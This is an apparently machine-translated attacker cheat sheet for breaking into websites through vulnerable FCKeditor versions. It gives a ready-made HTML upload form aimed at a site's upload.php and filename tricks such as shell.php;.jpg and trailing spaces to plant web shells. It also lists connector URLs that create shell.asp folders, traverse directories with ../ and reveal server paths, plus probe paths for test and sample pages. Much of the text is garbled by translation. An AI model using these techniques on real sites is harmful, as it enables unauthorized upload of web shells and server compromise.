1. Review Editor version
FCKeditor / _whatsnew.html
--------------------------------------
2. Version 2.2 version of
Apache + linux environment to add later upload files. Breakthrough! Test.
--------------------------------------
3.Version <= 2.4.2 For php Media types not to upload the file type of control in place to deal with PHP upload, causing the user to upload arbitrary files! The following will be saved as a html file, modify the action address.
<form ID = "frmUpload" the enctype = "multipart / form-Data"
Action = "http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" Method = " POST "> A new new the Upload File: <br>
<INPUT type =" File "name =" NewFile "size =" 50 "> <br>
<INPUT ID =" btnUpload "type =" Submit "value =" the Upload ">
</
form> --------------------------------------
4.FCKeditor file upload change "_" Workaround underlined. ""
Very often upload files such as: shell.php.rar or shell.php; .jpg becomes shell_php; .jpg This is a change in the new version of FCK.
4.1: Submit shell.php + Space bypass
but space only win support * nix system is not supported [shell.php and shell.php + Spaces are two different files were not tested.
4.2: continue uploading a file with the same name can be changed shell.php; (1) .jpg can create a new folder, detecting only the first stage of the directory, if the skip is not limited to two directories.
--------------------------------------
5. 突破建立文件夹
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
——————————————————————————————————————
6. FCKeditor upload address test file
FCKeditor / Editor / filemanager / Browser / default / Connectors / test.html
FCKeditor / Editor / filemanager / the Upload / test.html
FCKeditor / Editor / filemanager / Connectors / test.html
FCKeditor / Editor / filemanager / Connectors / uploadtest.html
--------------------------------------
7. Common upload address
FCKeditor / Editor / filemanager / Browser / default / Connectors / ASP / connector.asp? The Command = GetFoldersAndFiles & Type = Image & the CurrentFolder = /
FCKeditor / Editor / filemanager / Browser / default / browser.html? Of the type = Image & Connector = Connectors / ASP / connector.asp
? FCKeditor / Editor / filemanager / Browser / default / browser.html & Connector Type = Image = HTTP: //www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver: 2.6 .3 test by)
JSP version:
? FCKeditor / Editor / filemanager / Browser / default / browser.html Type = Image = Connectors & Connector / JSP / connector.jsp
pay attention to the red part to modify the script language actually used FCKeditor, blue can be self definition file
folder name can also use ../ .. directory traversal, purple part of the actual website address.
--------------------------------------
8. Other upload address
the FCKeditor / _samples / the default.html
the FCKeditor / _samples / ASP / sample01.asp
the FCKeditor / _samples / ASP / sample02.asp
the FCKeditor / _samples / ASP / sample03.asp
the FCKeditor / _samples / ASP / sample04.asp
Usually many _samples directory site have been removed, you can try.
FCKeditor / editor / fckeditor.html can not upload a file, you can click the button to upload pictures and then select Browse server files can be uploaded to jump to the page.
--------------------------------------
9. directory listing vulnerabilities can also be uploaded to help find address
Version 2.4.1 test by
modifying the parameters CurrentFolder use ../../ to enter a different directory
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder = .. / .. / ..% 2F & NewFolderName = shell.asp
can view all directory sites based on XML information returned.
FCKeditor / editor / filemanager / browser / default / connectors / aspx / connector.aspx Command = GetFoldersAndFiles & Type = Image & CurrentFolder =% 2F?
Can directly browse the letter:
JSP version:
FCKeditor / Editor / filemanager / Browser / default / Connectors / JSP / Connector? GetFoldersAndFiles the Command & Type = = =% 2F & the CurrentFolder
--------------------------------------
10.爆路径漏洞
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
——————————————————————————————————————
11. FCKeditor passive restriction policy as a result of lax filtering issues
affect versions: FCKeditor xx <= FCKeditor v2.4.3
vulnerable Description:
FCKeditor v2.4.3 File category in default deny uploading type:
HTML | HTM | PHP | PHP2 | PHP3 | php4 | php5 | phtml | pwml | inc | asp | aspx | ascx | jsp | cfm | cfc | pl | bat | exe | com | dll | vbs | js | reg | cgi | htaccess | asis | sh | shtml | shtm | phtm
Fckeditor 2.0 <= 2.2 allow uploading asa, cer, php2, php4, after inc, pwml, pht suffix file uploads its stored files directly with $ sFilePath = $ sServerDir. $ sFileName , without the use of $ sExtension suffix direct resulting in the win plus a later upload files. to break [untested]!
and in apache, because "Apache filename parsing flaw loophole" also can take advantage of the other recommended file category to the other upload vulnerability defined TYPE variable to upload files, according to FCKeditor code, which limits most narrow.
Met directly upload script files is good, but some versions may not be uploaded directly can take advantage added to the file name when uploading. Or spaces bypass, you can also take advantage of loopholes in 2003 resolved to establish xxx.asp folder or upload xx. ASP;
.jpg! --------------------------------------
12. The oldest vulnerability, Type file no restrictions!
I come into contact with the first fckeditor loopholes. Version is unknown, it should be very old, because the program type = xxx type is not checked. We can directly upload the configuration change type = Image Type = hsren file so that you can create a folder called hsren, a new type, no restrictions, you can upload any script!